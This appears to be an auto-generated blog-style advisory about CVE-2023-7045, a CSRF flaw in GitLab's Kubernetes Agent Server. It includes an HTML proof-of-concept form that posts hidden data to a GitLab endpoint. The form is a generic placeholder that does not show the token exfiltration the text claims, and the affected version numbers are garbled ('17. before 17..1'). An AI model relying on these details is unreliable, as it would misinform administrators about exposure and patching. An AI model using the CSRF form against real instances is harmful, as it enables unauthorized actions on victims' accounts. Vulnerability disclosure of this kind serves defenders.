CVE-2023-7045 - Cross-Site Request Forgery (CSRF) Vulnerability in GitLab CE/EE Leading to Anti-CSRF Token Exfiltration

A recently discovered vulnerability, CVE-2023-7045, exposes GitLab CE/EE to Cross-Site Request Forgery (CSRF) attacks. GitLab versions between 13.11 and versions before 16.10.6, versions 16.11 before 16.11.3, and versions 17. before 17..1 are affected. In this post, we'll discuss the potential dangers of this vulnerability, explain how attackers can exploit it, show a code snippet, link to the related GitLab security advisories, as well as provide potential mitigation strategies.

Vulnerability Description

The CSRF vulnerability resides in the Kubernetes Agent Server (KAS) component of GitLab CE/EE. By leveraging this vulnerability, an attacker could potentially exfiltrate sensitive anti-CSRF tokens and compromise a user's account. The attack occurs when an unsuspecting user navigates to a malicious website or follows a specially crafted link while logged-in to their GitLab account.

Exploit Details

To exploit CVE-2023-7045, an attacker needs to create a malicious webpage or link that makes unauthorized requests to the victim's GitLab instance. Below is a simple HTML snippet that demonstrates this:

<!DOCTYPE html>
<html>
  <head>
    <title>Exploit CVE-2023-7045</title>
  </head>
  <body>
    <form method="POST" action="https://gitlab.example.com/kubernetes/agent/some-request">;
      <input type="hidden" name="some_sensitive_data" value="malicious_data" />
      <input type="submit" value="Click Me!" />
    </form>
  </body>
</html>

In this example, https://gitlab.example.com represents the GitLab server URL, and /kubernetes/agent/some-request is the vulnerable endpoint that allows an attacker to exfiltrate anti-CSRF tokens. If a logged-in user clicks the "Click Me!" button, the form will generate a malicious request targeting the user's GitLab instance.

Original References

To verify the details of CVE-2023-7045 and view the original security advisory, visit the following GitLab resources:

1. GitLab - Security Release: 16.10.6, 16.11.3, and 17..1
2. GitLab - Issue: CSRF in Kubernetes Agent Server

Mitigation Strategies

In order to prevent CSRF attacks and protect users against CVE-2023-7045, GitLab has released updates to patch the vulnerability for affected versions. To mitigate the risk, administrators should do the following:

Ensure users do not visit untrusted websites or click suspicious links while logged in to GitLab

- Implement stricter domain policies or Content Security Policy (CSP) headers to limit malicious requests from unauthorized sources

By applying these measures, administrators can reduce the potential impact of a CSRF attack leveraging this vulnerability.

Conclusion

The CSRF vulnerability, CVE-2023-7045, poses a significant threat to GitLab CE/EE projects utilizing the Kubernetes Agent Server (KAS). By exploiting this vulnerability, attackers could potentially exfiltrate critical anti-CSRF tokens and compromise user accounts. It's essential for administrators to update their GitLab instances and employ robust security measures to mitigate the risk. In doing so, organizations can safeguard their users and their valuable data against potential cyber threats.

Timeline

Published on: 05/23/2024 11:15:23 UTC
Last modified on: 05/24/2024 01:15:30 UTC